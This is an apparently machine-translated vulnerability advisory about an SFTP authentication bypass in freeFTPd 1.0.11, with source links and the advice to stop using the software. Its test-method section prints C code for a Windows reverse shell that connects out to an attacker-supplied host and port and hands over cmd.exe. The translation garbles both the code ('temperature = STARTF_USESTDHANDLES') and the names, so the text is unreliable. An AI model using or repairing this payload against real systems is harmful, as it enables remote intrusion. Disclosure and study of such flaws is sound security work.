FreeFTPD 'sftp 'authentication mechanism Bypass Vulnerability and temporary solution

Affected System: freeFTPd 1. x Description: FreeFTPd is a free FTP + SSL/SFTP Server Based on WeOnlyDo FTP/SFTP. The SFTP authentication mechanism of FreeFTPD 1.0.11 and other versions has an error. Attackers can bypass the authentication process and execute arbitrary code with service permissions. <* Source: Kingdom (kingcope@gmx.net) link: http://secunia.com/advisories/51454/ http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html *> Test method: The following procedures (methods) may be offensive and only used for security research and teaching. Users are at your own risk! Kingsway (kingcope@gmx.net) provides the following test methods: // bd. cpp: Defines the entry point for the console application. // # include <winsock2.h> # include <stdio. h> # pragma comment (lib, "ws2_32") WSADATA wsaData; SOCKET Winsock; SOCKET Sock; struct sockaddr_in hax; STARTUPINFO ini_processo; PROCESS_INFORMATION processo_info; int main (int argc, char * argv []) {LPCSTR szMyUniqueNamedEvent = "sysnullevt"; HANDLE m_hEvent = Cre AteEventA (NULL, TRUE, FALSE, szMyUniqueNamedEvent); switch (GetLastError () {// app is already running case ERROR_ALREADY_EXISTS: {CloseHandle (m_hEvent); return 0; // now exit break;} // this is the first instance of the app case ERROR_SUCCESS: {// global event created and new instance of app is running, // continue on, don't forget to clean up m_hEvent on exit break;} WSAStartup (MAKEWORD (2, 2 ), & WsaData); Winsock = WSASocket (AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int) NULL, (unsigned int) NULL); if (argc! = 3) {fprintf (stderr, "Usage: <rhost> <rport> \ n"); exit (1) ;}hax. sin_family = AF_INET; hax. sin_port = htons (atoi (argv [2]); hax. sin_addr.s_addr = inet_addr (argv [1]); WSAConnect (Winsock, (SOCKADDR *) & hax, sizeof (hax), NULL); memset (& ini_processo, 0, sizeof (ini_processo); ini_processo.cb = sizeof (ini_processo); temperature = STARTF_USESTDHANDLES; temperature = HANDLE = (HANDLE) Winsock; CreateProcessA (NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) & ini_processo, & processo_info); return 0 ;}Temporary solution:If you cannot install or upgrade the patch immediately, NSFOCUS recommends that you take the following measures to reduce the threat: * Stop using freeFTPd. Vendor patch: freeFTPd -------- currently the vendor has not provided patches or upgrade programs, we recommend that users who use this software stay tuned to the vendor's home page to get the latest version: http://freeftpd.com/